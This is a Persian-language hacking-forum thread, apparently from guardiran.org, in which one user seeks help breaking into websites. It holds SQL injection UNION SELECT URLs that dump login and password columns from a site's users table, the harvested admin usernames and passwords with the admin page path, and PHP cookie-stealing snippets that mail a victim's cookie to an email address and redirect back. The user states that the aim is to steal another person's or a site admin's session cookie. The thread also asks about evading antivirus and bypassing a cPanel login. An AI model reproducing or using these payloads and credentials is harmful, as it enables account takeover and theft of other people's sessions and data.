OOOHHHAAACCCKKKOOO

با سلام. من یوزر و پسوورد سایت [Hidden Content] رو با باگ sql پیدا کردم. ولی نمی تونم با یوزر و پسووردی که پیدا کردم نفوذ کنم. از مدیران و کاربران محترم می خوام که اگه با باگ دیگه ای تونستن نفوذ کنن یا فهمیدن که اشکال کار من چیه، بگن چطور وارد شدن که من هم وارد بشم. با تشکر. 😖 ادمین پیج: [Hidden Content]/admin/login.php یوزر: dukman و sokrussia پسوورد: lol14081986gg و w375fTaqu لینک باگ: [Hidden Content]/sanatory?id=6569 union select 1,2,3,4,5,6,group_concat(login),8,9,10,11,12,13,14 from users%23 [Hidden Content]/sanatory?id=6569 union select 1,2,3,4,5,6,group_concat(pass),8,9,10,11,12,13,14 from users%23

ببخشید اسپم نمی دم ولی خب وقتی به جوابم نرسیدم و تاپیک تو صفحه ی اصلی نیست که کسی جواب بده چی کار کنم خب؟

ببخشید من رمز رو می زنم می نویسه رمز اشتباهه.

بله خیلی ممنون ولی من خود کدش رو می خواستم تا مثل این سایت یه سایتی بسازم.

ببخشید با برنامه که قطعا میشه منظور من اشتراک از طریق خود سایت هست.

کسی نبود؟

سلام بله مثل Anydesk. (البته فقط اشتراک صفحه هم باشه کافیه.)

با سلام. آیا میشه کدی نوشت و در سایت قرار داد که با اون سایت بتونیم صفحه ی کامپیوترمون رو به اشتراک بگذاریم؟

ممنونم. فقط اگه صفحه ای که کاربر توش هست بجای html و همون کد قدم دوم فقط با php نوشته شده باشه و کدش هم این باشه، کوکیش در اون صفحه به ایمیل 123@gmail.com ارسال میشه؟ <?php $cookie = $_GET['cookie']; mail( '123@gmail.com', 'Hello!', "$cookie." );

شاید منظور من رو اشتباه متوجه شدین. لاگینی در کار نیست. فرض کنید که مثلا من به لینک [Hidden Content] دسترسی کامل دارم.(که این لینک نیاز به لاگین نداره.) حالا میخوام یک کاری کنم که هر کی به این لینک وارد شد، من کوکیش رو ببینم. منظورم من هم از کوکی این کوکی هست 👇

خب راستش هدف من دسترسی به سایت نیست هدف من سرقت کوکی اون شخصه. (کوکیش در اون سایتی که من بهش دسترسی کامل دارم.)

خب اگه من به صورت کامل به سایت دسترسی داشته باشم، میتونم کوکی تارگت رو به سرقت ببرم؟

پس چطور اون کوکی رو با کد PHP یا Java script بگیرم؟

می خوام یه کد ایمیل به این کد اضافه کنم و بعد به یک شخصی بفرستم تا وقتی فایل حاوی کد رو باز کرد، کوکیش نسبت به سایت گوگل به اون ایمیلی که مشخص کردم، ارسال بشه.

یعنی اگه این کد رو تو یک فایل php بریزیم، وقتی بازش کنیم، اون فایل php کوکی ما نسبت به سایت گوگل رو نشون میده؟ و این که آنتی ویروس گیر میده بهش یا نه؟

.

یعنی نمیشه ادمین یک سایت که میخوایم کوکیش رو بدزدیم از سایت خودش به صفحه ی php ای که توش این کد ها هست هدایت بشه و کوکیش دزدیده بشه؟ php?> ;['cookie = $_GET['cookie$ ;['uri = $_SERVER['HTTP_REFERER$ ,'!mail( 'Hello@gmail.com', 'We got another one ;( ".Go to $uri and present cookie $cookie" ;(header( 'Location: '.$uri <?

نه منظورم اینه که مثلا کوکی یک سایت مشخص مثلا guardiran.org رو به ایمیل مشخصی ارسال کنه.

سلام ببخشید چطور یک کد php بنویسم که وقتی فایل php رو باز می کنم، کوکی من به یک ایمیل ارسال بشه؟

با سلام. چطور میشه بدون داشتن دسترسی آدرس دیتابیس یک سایت رو پیدا کرد؟ البته آدرس ادمین پیج رو می دونم.

نمیدونم چی بگم ولی شاید بشه یه کاریش کرد. (hxd (hex editor رو نصب کن (البته اگه ویروس بزاره) بعد از قسمت file و بعد از قسمت open یکی از فایل های ویروسی رو باز کن. (txt باشه بهتره.) بعد یه سری کد نشون میده اون ها رو با کنترل a و کنترل c کپی کن و بفرست. شاید ازش بشه فایل اصلی رو استخراج کرد. HxD.zip

لینک دانلود خرابه.

با سلام. دقیقا چطوری میشه صفحه ورودی cpanel یک سایت رو دور زد؟ ([Hidden Content] [Hidden Content] [Hidden Content])

guardiran.org

آخه نمیدونم چرا درست متوجه نمیشین. من منظورم این هست که ببینم چه سایت هایی توشون از مثلا این کد html استفاده شده: <!DOCTYPE HTML> <!--Coded By MR.IMAN_Read The Rule Of CopyRight--> <html xmlns="[Hidden Content];